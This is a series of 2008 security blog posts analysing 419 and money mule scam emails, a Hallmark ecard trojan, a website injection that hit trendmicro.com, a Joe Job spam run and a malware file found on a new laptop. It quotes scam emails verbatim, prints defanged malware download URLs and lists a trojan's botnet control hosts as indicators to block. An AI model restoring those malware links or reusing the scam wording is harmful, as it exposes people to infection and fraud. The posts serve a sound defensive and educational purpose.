Even though the English is very poor, the concept here is a bit more sophisticated than your average 419 scam. The email has been designed to look as though it has been misdelivered in some way - so the victim thinks that this should have been sent to someone else. But there's a dangling carrot of $1.2m here, and some people will see an opportunity to try to bilk "Eze John" out of the money.

Of course, there is no money.. but there will be a whole set of mysterious "fees" and expenses to try to get the money out, that at least is standard for a 419 scam. The twist is here that the VICTIM is also attempting to perpetrate a fraud, and this makes it very unlikely that the victim will ever go to the police to report it. It is also possible that the scammer might try to blackmail the victim to keep it quiet.

This approach offers a great deal of protection for the fraudsters. The original email is rather vague and might not be obvious to law enforcement. And if anyone takes the hook, then the victim too appears guilty.

This attempt is a bit of a lame one, but a truly successful con artist can use these techniques with a great deal more polish. So although you would never follow up on a misdirected email like this, it is easy to see how people can fall for it.

Monday, 7 April 2008

"uslegaljobs.net" Money Mule Scam

Money mule scams are usually associated with Eastern European criminals, but this one is slightly different originating from an IP address of 41.219.194.90 in Nigeria.




HILTON FINANCE HOME Inc.
Industrial & Personal Financier's
Our Ref: FMF-117-212.
MEMO: 2008-2nd Quarter-Online Search Recruitment Exercise.

HILTON FINANCE HOME Inc in-support of Magnum Building Company Int (Interior
Furniture Experts) will be opening this offer to Interested Individuals/Corporate
bodies in the United States, Canada, Australia and the Entire Europe to enable them
make an extra 10.05% commission based earning right from the convenience of their
home or office apartment and without affecting their primary occupation.

WHAT WE DO:-
We issue and help to secure loans on behalf of customers who make purchases from our
partner company Magnum Building Company Int which we also process and monitor to
make sure that our loans are used for the sole reason of financing our customer
purchases with our parent company.

ABOUT THIS JOB:-
Since most of our customers make payments in large Instrumental fractions after
securing a finance loan for them, our mother company became faced with the task of
receiving loan payments from Magnum Building Company Int customers through our
conventional method of payments remittance due to delays in processing time. Hence,
we decided to advertise and search for Individuals of GOOD STANDING who will assist
the company receive these finance payments directly from our finance houses/banks as
on behalf of our customers and then forward on to the company on a weekly/monthly
basis. Some little amounts however will come from our customers directly

YOUR EARNING:-
You will be accredited as our legal Payment representative in the United States,
Canada, Australia and the Entire Europe and will be in charge of all payments from
within your region, for this you will be paid a 10.05% of all payments you receive,
and forward on a weekly/monthly basis.

To get more Information about this Business arrangement, you should reply to our
e-mail providing the Information listed below and we will either respond by regular
mail or Fax providing you with our business prospectus.

First Name:
Last Name:
Contact Address:
Phone:
Fax Numbers:
Best Time to Call:

Please send your correspondence and Information to.
Recruit Department.
David Benson.
E-mail: register@uslegaljobs.net
IMPORTANT NOTICE:- Please be advised that this is a 100% legal business endeavor and
that it is only a contract based employment program and that it will not in any way
affect your primary employment.

Copyright 2008-2009 Hilton Finance Home Inc © All right reserved




This is soliciting replies to a domain of uslegaljobs.net, registered in January 2008 - this appears to be registered to a real address and possibly with genuine contact details. Usually in these cases, the contact details are false, so I've attached this as an image rather than something indexable.



The domain is hosted by Microsoft, and although there's no web site there is an MX record:
uslegaljobs.net mail is handled by 25 pamx1.hotmail.com

So, on a first inspection the domain looks legitimate.. it might even be that it is legitimately registered but has been hijacked. Nonetheless, this is a classic money mule scam where the victim thinks they are getting 10.05% commission for next to no work.. the Nigerian IP address is a clincher too. And you've got to love the phrase please be advised that this is a 100% legal business endeavor which is always another sure sign of a scam.

Tuesday, 1 April 2008

Telephore - advertising gone too far?


Context-sensitive ads are all the rage, but Telephore is the first one to bring them to your mobile phone.. nope, not text messages, but spoken ads that interrupt your call!


What is even more troubling is that Telephore analyses your conversations with a sophisticated voice recognition system and stores them for later reference. Is this too much power to give to a private company? Mobile Gazette have more details on this controversial system.

Monday, 31 March 2008

BBC Argh


The BBC News website is a much-loved design institution. A very neat, conservative design it has remained pretty much unchanged since its inception. It would be fair to say that it is one of the most recognisable layouts in the business, along with Google and Amazon.

So, you mess with something like this at your peril.. and hats off to the BBC for trying to update the site without being too radical. It's a wider, less cluttered design (according the their blog entry).

Unfortunately, it no longer works on 800 pixel wide screens.. now although that resolution has almost died out on desktop PCs, there are a number of existing upcoming mobile devices that use it (e.g Nokia E90, Sony Ericsson Xperia) , and one of the great things about the BBC News site was that it would work well on almost anything.

To be honest, I can't remember anyone complaining about the 800 pixel wide "old" layout. And a lot of people will be uncomfortable with the change to a favourite web site, as the comments say.

If you have a bit of time on your hands, why not take a look at how the BBC News site has evolved over the past few years at the Wayback Machine.

Friday, 28 March 2008

A 419 spam with a twist

419 scams often involve pandering to human greed. In this case, the email is clearly designed to make you think that you have lucked into $800,000 through mistaken identity. Of course, the internal logic doesn't bear close scrutiny.

What's interesting about this email is that it has a calendar invitation on the bottom - clicking on it confirms your email address and presumably is designed to give the message an authentic twist.

Of course, there isn't $800,000 sitting around for you and you can guarantee that "Eze Ike" will try and bilk you out of some money along the way.



Vous êtes invité ::
Dear Friend,
Par votre hôte:
Eze Ike

Message:
Dear Friend,

I didnot forgot your past effort and attemps to assist me, now I'm
happy to inform you that i have suceeded in getting those funds
transferred under the cooperation of a new partner from Japan.

Now Contact my secretary ask him for ($800.000.00)for your compensation
his,name is Mr,Mike Bello, and his E-mail:(ifeany_eze01@yahoo.co.uk)
1,Your Full Name___ 2,Delivery address___ 3,phone number____ 4,email
address___
Thanks and God Bless You.
REGARDS
Dr,Eze Ike.

Date:
vendredi, 28 mars 2008
Heure:
10 h 00 - 11 h 00 (GMT+00:00)

Viendrez-vous ?

Répondre à cette invitation

Thursday, 27 March 2008

Lazy 419 spam

Is it me, or is the quality of scam spam going down these days? This fake lottery notification doesn't even try to look convincing.

Subject: Easter Notification(You have won 953,000:00gbp)
From: "UK THUNDERBALL LOTTERY" delroyclarke@nf.sympatico.ca
Date: Thu, March 27, 2008 11:50 am


You won 953,000:00Pounds in the Uk thunderball online Lottery held on
25th of
March 2008.
Contact Person.
MRS GAIL NEUVILLE
E-MAIL: ukthunderball_claimlottery4@yahoo.co.uk
contact her with your details:
1.Name.
2.Address.
3.Nationality.
4.Age.
5.Occupation.
6.Phone/Fax.
Regards
Mrs.Gail Neuville

I think I will give it a miss, thanks.

Incidentally, you can report spam like this to Yahoo through their online reporting tool. The user ID you are reporting on is everything before the @ sign on the Yahoo email address. It is worth stating that even through the spam doesn't come from the Yahoo network, it does use a drop email address at Yahoo to process replies.

Tuesday, 25 March 2008

Is 97885 really Vodafone?

The UK's premium rate SMS (text messaging) business is worth over £1 billion per year. It's not surprising then that scammers are in on the act, looking for a slice of that revenue.

These premium rate numbers are use "SMS shortcodes" - but these shortcodes can also be used for non-premium rate (or free) numbers. So how can you tell which is which?

Take this one for example - a text message sent to Vodafone customers that says the following:

From 97885
From Vodafone: Service Enquiry. We are always looking to improve our service. Please help us by answering 2 questions. Reply Yes to start, all replies are free.

On the surface, it all looks pretty legitimate. But wait.. isn't this the kind of approach that scammers use? There have been several cases where spammers can work out your mobile phone network, and who can tell if 97885 is a premium rate number or not?

Well, one organisation that should know is the stupidly named PhonepayPlus body (formerly ICTIS) that is meant to keep track of these premium rate texts. They have a service called SMSus which can look up a premium rate SMS number by text (why they can't do this on the web is a mystery).

So, does sending the 97885 number for SMSus help? No.


From 76787
From SMSus: No info held about this number. Have a concern? Call 0800 500 212 open 8-6, Mon-Fri. Calls free from landline, mobile network charges apply.?
So, pretty useless. Eventually though, a response to an online support call to Vodafone indicates that 97885 is Vodafone, and it is free.

But surely the problem here is that the system is so fundamentally broken that no-one can tell a real messager from a scam? Perhaps it is time that whoever is actually responsible for regulating this mess comes up with an easy way to identify the true owners of SMS shortcodes and can say how much they may cost.

Apple Safari - a driveby download or what?

Millions of people are currently wondering what a "Safari" icon is doing on their Windows desktop. Is it something they installed? Is it adware? Or has Apple turned to the dark side?

Well, I'm afraid that Apple have turned to the dark side. If it wasn't annoying enough that iTunes keeps appearing on your desktop if you just want QuickTime, Apple's latest ploy is to push their Safari web browser out as an "update" to your existing software.. even if you have never installed Safari before.

A legitimate upgrade? Or deceptive advertising? Read more about the drive-by install here, and then decide if Apple software has any place on your Windows desktop machine.

Thursday, 20 March 2008

"Gold is Risky - Green is a solid investment" - eFoodSafety.com (EFSF.OB) Spam


The Boulder Pledge is an important principle when it comes to fighting spam - basically, it is a commitment to never buy a product advertised in spam. Some people take it one step further, and say that they will never do any kind of business at all with a company that spams.

It's particularly pathetic when a firm resorts to spam to try to drum up investors. And yet, in the case of eFoodSafety.com (EFSF.OB) - a stock that has lost two thirds of its value in the past 12 months - that appears to be exactly what it happening.

A mystery spam entitled "Gold is Risky - Green is a solid investment" has been circulating over the past couple of days, both by email and also on several blogs. The link in the message points to a sign-up page at http://pws.prserv.net/RevNew/EFSF_LLP01.html with the following blurb:

To the Growth-Oriented Investor...

This could be one of the best buys you make during these recessionary times. And you can be certain this recession will reek havoc on the unprepared.
Yes!
You can achieve profits in today's market!

The coming months will be a nightmare for investors seeking significant profits, except for those who successfully position themselves in key sectors like biotech.
Be among the first to learn about this new trend opportunity.
Download our Company Fact Sheet NOW!

The growth of these sector markets will be so dramatic that it can be confidently forecasted that this as an investing “mega-trend” worth billions in new market capitalization for companies with the right products at the right time.

Download the Company Fact Sheet of one of these innovative biotech companies NOW!

The email itself is just a picture of an attractive and presumably partially naked woman, the subject and sender are:

Subject: Gold is Risky - Green is a solid investment
From: "Investing Ideas" Ignite@InvestingIdeas.prserv.net
Date: Thu, March 20, 2008 2:58 am


Some detective work is required to find out where it comes from. The address on the image is 7702 E Doubletree Ranch Road, Suite 300 Scottsdale, AZ 85258. Some research shows that this is connected with eFoodSafety.com, and indeed the three products pictured are eFoodSafety products: Cinnergen, Immune Boost Bar, Talsyn Scar Cream (shown here).

So, given the address matches eFoodSafety.com, and the only three products shown in the spam and on the landing page are eFoodSafety.com's products, then it is beyond a reasonable doubt that this is an attempt to attract investors to the EFSF.OB stock.

There's no indication to say that eFoodSafety.com is anything other than a legitimate company, and it is not even clear if they send this spam out themselves or contracted a third party to do it (technical note: the spam originates from 69.60.98.141). It does not appear to be a pump-and-dump spam. We do not know if Redwood Consultants, LLC (who are listed as their IR firm) knows about this either.

So - back to the Boulder Pledge. If you feel that you've received this message and that it was unsolicited, then you certainly shouldn't invest in EFSF.OB. As we have said before, a mismanaged email campaign can seriously damage the reputation of a firm. Perhaps eFoodSafety.com would like to find the people responsible and terminate their relationship with them before more harm comes their way.

Thursday, 13 March 2008

Very authentic looking Hallmark ecard trojan

A very authentic (but fake) trojan was send out overnight purporting to be from Hallmark.com


A Friend has sent you a Hallmark E-Card.

If you recognize this name, click the link to see your E-Card.
http://www.hallmark.com/ECardWeb/ECV.jsp?a=[snip]


If this name is not familiar to you and you're concerned about online security, please use the following steps:

1. Visit http://www.hallmark.com/getecard
2. Enter your e-mail address in the Original Recipient.s E-Mail Address box.
3. Enter EG0694262772475 in the Confirmation Number box.
4. Click Display Greeting.

Want to send an E-Card too ? Visit www.hallmark.com/ecards



To view Hallmark’s privacy policy or for questions, visit www.hallmark.com, and click the links at the bottom of the page.


The displayed links are all safe, however the FIRST link actually points to hxxp:||pop.ayudaenaccion.org.sv|card.exe



VirusTotal detection is not bad.

Files loaded are as follows:
%systemroot%\system32\nicks.txt
%systemroot%\system32\remote.ini
%systemroot%\system32\script.ini
%systemroot%\system32\servers.ini
%systemroot%\system32\sup.bat
%systemroot%\system32\sup.reg
%systemroot%\system32\users.ini
%systemroot%\system32\aliases.ini
%systemroot%\system32\control.ini
%systemroot%\system32\explorer.exe
%systemroot%\system32\mirc.ico
%systemroot%\system32\mirc.ini


Payload is Zapchast, basically it tries to join the machine to an IRC controlled botnet.

Added:
The remote.ini it drops onto your machine has some interesting host names you might want to block and/or investigate:

[users]
n0=100:*!*@lamerzkiller.users.undernet.org
n1=100:*!*@209.43.75.13
n2=100:*!*@estranho-colo.iquest.net
n3=100:*!*@OMGyouSUCK.users.undernet.org
n4=100:*!*@CoReCt.users.undernet.org
n5=100:*!*@hxr.users.undernet.org
n6=100:*!*@BebiDeea.users.undernet.org
n7=100:*!*@asdz.users.undernet.org
n8=100:*!*@ZmAu.users.undernet.org
n9=100:*!*@ReKt.users.undernet.org
n10=100:*!*@BebeDulce.users.undernet.org
n11=100:*!*@ReCt.users.undernet.org
n12=100:*!*@hacler.ro
[variables]
n0=%HAck1 #GangstaRap | #:">
n1=%console
n2=%utime 1205420752
n3=/away :sã îmi suge-ti cuca zdrentzelor !
n4=%ochan #GangstaRap | #:">

trendmicro.com compromised - sort of.

McAfee has flagged up another mass defacement on their blog here, various sites have been injected with a reference to hxxp:||www.2117966.net|fuckjp.js (I assume that you can undo the trivial obfuscation if you really, really want to look).

A Google search for 2117966 fuckjp.js shows over 9000 hits. Obviously you won't want to visit any of these infected sites, so take care.

However, one of the sites showing up is trendmicro.com (see screenshot). At the time of writing, the Trend Micro site has been cleaned up, and it looks as though the infection wouldn't have worked on that particular site. Nonetheless, it is always worrying when you see a security vendor site compromised in this way. This isn't the first time this has happened to this type of site - CA.com was infected back in January.




The Google cache gives away the infection (use WGET, SamSpade or a non-Windows machine to examine the cache, never a full blown browser on a Windows system).

This is the current (clean) version of www.trendmicro.com/vinfo/grayware
/ve_graywareDetails.asp?GNAME=TSPY_LINEAGE&VSect=St




The infected version (from the cache) shows the altered code:



A close look at the code shows that the injection has been borked somewhat and wouldn't actually work. However, there were potentially hundreds of infected pages, some of which may have been more successful in injecting malware.

The date of the Google cache is or or about 4th March, so a week ago.

2117966.net is on 125.46.105.224 in China, at the time of writing the site is down, however the Google cache comes up with something funny for the front page:



Hacker humour?

Anyway, I have no particular axe to grind against Trend Micro, they have a decent set of products and are one of the more useful companies in the security arena. Again, it just goes to show that even trusted sites can be compromised.

Monday, 10 March 2008

Truckerjobsearch.com - spam, scam or stupidity?

I'm not interested in trucks, there is no reason for anyone to send me an email about trucking. And usually, when I see email about "transportation" jobs, then it tends to be some sort of money mule scam.

So a spam email advertising truckerjobsearch.com rang alarm bells - it certainly seemed to tick all the boxes for a scam operation. But is it a scam?

Trucking Companies & Trucking Recruiters
Need to Hire More Class A Truck Drivers?
Let Trucker Distribution Inc Save your Recruiters Time & Money.

LIMITED TIME OFFER
ONLY $400.00 per month

FREE TOP BANNER ON ALL FOUR WEBSITES

NOW for ONLY $400.00 per month you can:

Receive on Average 30-50 New Truck Driver Applications Daily
(Depending on your company criteria)
Get a Top Banner on Four Premium Websites

Get a Side Profile Banner on Four Premium Websites
Hire More CDL Truck Drivers for Less
Cut Your Recruiting Budget in Half

NewTruckDrivingJobs.com
MonsterTruckDriverJobs.com
TruckerGeek.com
TruckerJobSearch.com
We are so confident in our service, that we will give your company a
FREE 24 Hour Trial via our E-MAIL system.
(Applications over the web)

Combination Rates

"All 4 Websites"
Daily Applications via Email
Side Profile Banners
Only $500.00 per month

"All 4 Websites"
Daily Applications via Email
Side Profile Banners
Data Base Access
Only $600.00 per month

"All 4 WebSites"
Daily Applications via Email
Side Profile Banners
Database Access
Featured Top Banner
Only $700.00 per month

"All 4 WebSites"
Daily Applications via Email
Side Profile Banners
Database Access
Featured Top Banner + Bottom Banners
Plus Brochure Distribution
Only $800.00 per month
---------------------------------------------------------
Individual Services:

"Brochure Distribution"
Only $450.00 per month
(150 Truck Stops )

"Top Banner"
Only $250.00 per month
(Website of Choice)

"Bottom Banner"
Only $200.00 per month
(Website of Choice)

Let Trucker Distribution build a custom package for your company TODAY!


For a FREE Trial Click Here or Call:1-888-675-5551

Originating IP is 199.239.248.221 which identifies itself as truckerout.com, the spamvertised site is hosted on 161.58.218.47. Both servers are hosted by NTT America Inc.

An investigation into the domain names and registration details shows that the sites appear to be legitimate, the sending IP address and the rDNS matches the advertised sites. There is no indication that these sites are not exactly what they say they are. So what gives?

The most common explanation for seeing spam of this type is that the operators have been conned into buying a CD that promises millions of email addresses for a very low price. Very often, these are simply scraped from web sites, or can even be just completely made up.

In all likelihood, the person marketing for this company has bought a bad mailing list in good faith. It doesn't mean that they are not a spammer (the email is certainly not CAN SPAM compliant), but it goes to demonstrate just how easy it is to damage your reputation by mismanaging an email campaign. Buying in mailing lists is best avoided, and even reputably list brokers can sell lists that have been contaminated with bad data. The only real way to be certain is to collect your own lists, if you have to buy them in then you need to research the company you are dealing with to ensure that they really exist and are wholly above board.

Thursday, 6 March 2008

StampOffers.com - Spam or Joe Job?



There's a whole bunch of spam doing the rounds as follows:

Subject: Sell for FREE Forever !!!!!!!!!!!!!!
From: stampoffers@yahoo.com
Date: Thu, March 6, 2008 3:21 pm

The idea for StampOffers.com developed in the summer of 2002.
It all started with the creation of a chat board outside of eBay that would allow fellow philatelist the ability to talk about anything without being criticized for not maintaining a strictly philatelic conversation. Those who have made a non-philatelic post to the eBay stamp chat board know what it is like. There was a discovery on this new chat board that collectors would like to buy, sell, and trade among those who visited the chat and a few of the frequent users asked about someone starting an auction site just for stamp collectors. In January of 2003, StampOffers.com was launched!

There was much back and forth about whether StampOffers.com would be able to draw enough users and continue a steady growth and it was decided that the only way to do this was to operate with one philosophy – provide a viable alternative on the world wide web in which collectors from around the world could buy, sell, and trade stamps in an effort to further the hobby. Oh yeah…..and do it for FREE!!

To this day, StampOffers.com provides a site that allows sellers to enter a basic listing with NO INSERTION FEE and NO FINAL VALUE FEE. So how does StampOffers.com continue to operate without collecting fees? Well, let’s just say it is a combination of fellow collectors who are very appreciative of StampOffers.com’s existence combined with StampOffers.com’s desire to contribute to the hobby of philately!

Therefore, go ahead and use the site as much as you wish! The only real favor that is asked is that you pass the word about StampOffers.com. Tell your customers, your fellow collectors, your stamp club friends, your local stamp dealer, and anyone else whom you believe would be as appreciative of the site as those who are using it today.

Thank you,

StampOffers.com - The World Is Finding Us!

Join Now

James Munch

You are receiving this mailing because you agreed to be a part of our opt in mailing list.
As you would expect, no such "opt in" authorisation has been given.

There are a couple of things that are odd about the spam - first of all it seems quite unlikely that a philately site would send out this type of email, the mail is sent out repeatedly to the same address (in an apparent attempt to annoy the recipient), and it has been aimed at a spamcop.net account which perhaps indicates that "reverse listwashing" is taking place to ensure that the mail does get reported as spam.

These are all classic indications of a Joe Job - a fake spam message sent by a third party in order to cause trouble, presumably in an attempt to shut StampOffers.com down. Joe Jobs can be hard to spot, but this certainly seems to tick all the boxes.

As of 6th March 2008, the emails are being sent from a server at 74.86.158.8 through a PHP script which fingers 64.74.124.39 as the possible sending IP. This latter email address is interesting because it belongs to an Autosurf scheme called autosurfunion.com - interestingly the same server has been used for this other apparent stamp related Job Job, presumably the autosurf server is being used as a proxy.

The line in the header to look for is:
X-PHP-Script: 74.86.158.8/~ez123/conf.php for 64.74.124.39

64.74.124.39 is operated by Globalcon.net (contact email appears to be reyner -at- globalcon.net), so try sending any abuse reports their way. Also the 74.86.158.8 server with the insecure redirector should be reported to abuse -at- greenolivetree.net or perhaps via their web form.

Incidentally, this is what StampOffers.com has to say on the subject:

24 February 2008 - SPAM EMAILS

This is a special announcement about a rash of SPAM emails going out.

First, let me apologize for this occurring. StampOffers.com does NOT send out SPAM emails!! The only emails that are sent are to those who are members of StampOffers.com.

Recently, there was an individual who gained access to the site as a bidder and placed a number of fake/fradulent bids. This user created 3 different ID's and attempted to wreak havoc with each one. It appears we have finally been able to block this person from accessing the site and thus has turned to another form of cowardly entertainment.

These emails ARE NOT coming from StampOffers.com, our host, nor any server that our host runs. Our host is working with me to file the proper complaints as seen below:

I am trying everything I can to stop this and apologize to everyone. I would like to ask your assistance. When receiving these emails, contact the ISP you find in the header and point them to this board.

I am a private individual who has been running this site for 5 years. I have no interest in making money (I provide the site for FREE for everyone to use) and definitely have no desire to send out SPAM emails.

Please, if you have any questions, feel free to use the contact button below and let me know.

Thank you for your patience and understanding.

James C. Munch
I tend to concur with StampOffers.com - there are lots of signs to indicate that this is a Joe Job attack, so if you receive on, please analyse the headers carefully and report to the correct service provider.

Monday, 3 March 2008

RavMon.exe virus on new Toshiba Satellite laptop

A few days ago I bought a very inexpensive Toshiba Satellite L40-18Z laptop from Comet in the UK. It's a basic laptop running Windows Vista, and it is certainly good enough for web browsing and wordprocessing.

But this particular laptop came with something extra. Despite the security seals being intact, and the OS having never been activated, the laptop came with a file called RavMon.exe on the C: and E: partitions.

RavMon.exe is an insidious virus that spreads on USB keys and drives, so it seems likely that this laptop was infected during the manufacturing process, despite having Symantec Anti-virus installed.

Of course, the first thing I did was remove Symantec and install ZoneAlarm, and ZA's Kaspersky anti-virus engine found RavMon.exe pretty much straight away. Thinking it was a false positive, I sent it to VirusTotal and the results speak for themselves.

File RavMon.exe received on 03.03.2008 20:38:32 (CET)
AntivirusVersionLast UpdateResult
AhnLab-V32008.3.4.02008.03.03Win-Trojan/Xema.variant
AntiVir7.6.0.732008.03.03TR/Agent.Abt.33
Authentium4.93.82008.03.02W32/Trojan.NAT
Avast4.7.1098.02008.03.02Win32:Agent-EDN
AVG7.5.0.5162008.03.03Generic3.NKU
BitDefender7.22008.03.03Trojan.Downloader.Chacent.A
CAT-QuickHeal9.502008.03.03Trojan.Agent.abt
ClamAV0.92.12008.03.03Trojan.Agent-3327
DrWeb4.44.0.091702008.03.03Win32.HLLW.Autoruner.198
eSafe7.0.15.02008.02.28Suspicious File
eTrust-Vet31.3.55822008.03.03Win32/Compfault.C
Ewido4.02008.03.03Trojan.Agent.abt
FileAdvisor12008.03.03-
Fortinet3.14.0.02008.03.03-
F-Prot4.4.2.542008.03.02W32/Trojan.NAT
F-Secure6.70.13260.02008.03.03W32/Agent.CUTV
IkarusT3.1.1.202008.03.03Trojan.Win32.Agent.abt
Kaspersky7.0.0.1252008.03.03Trojan.Win32.Agent.abt
McAfee52432008.03.03New Malware.eb
Microsoft1.33012008.03.03Worm:Win32/RJump.F
NOD32v229182008.03.03Win32/AutoRun.FQ
Norman5.80.022008.03.03W32/Agent.CUTV
Panda9.0.0.42008.03.03Generic Malware
Prevx1V22008.03.03Generic.Malware
Rising20.34.02.002008.03.03Trojan.DL.MnLess.n
Sophos4.27.02008.03.03Troj/QQRob-ADL
Sunbelt3.0.906.02008.02.28-
Symantec102008.03.03W32.Nomvar
TheHacker6.2.92.2312008.03.02-
VBA323.12.6.22008.02.27Trojan.Win32.Agent.abt
VirusBuster4.3.26:92008.03.03Packed/nPack
Webwasher-Gateway6.6.22008.03.03Trojan.Agent.Abt.33

Additional information
File size: 48640 bytes
MD5: 5557dd0fd5565f12a71c92e6aad7088f
SHA1: 1dd1be78715ff68354967adadc8b6990706caafa
PEiD: -
packers: NPack
Prevx info:

Luckily, the machine wasn't actually infected, but the .exe file was sitting there waiting to be clicked. Symantec would have detected this if it had updated in time, and as it is most AV products will detect the virus.

It just goes to show that you can't necessarily trust a PC straight out of the box.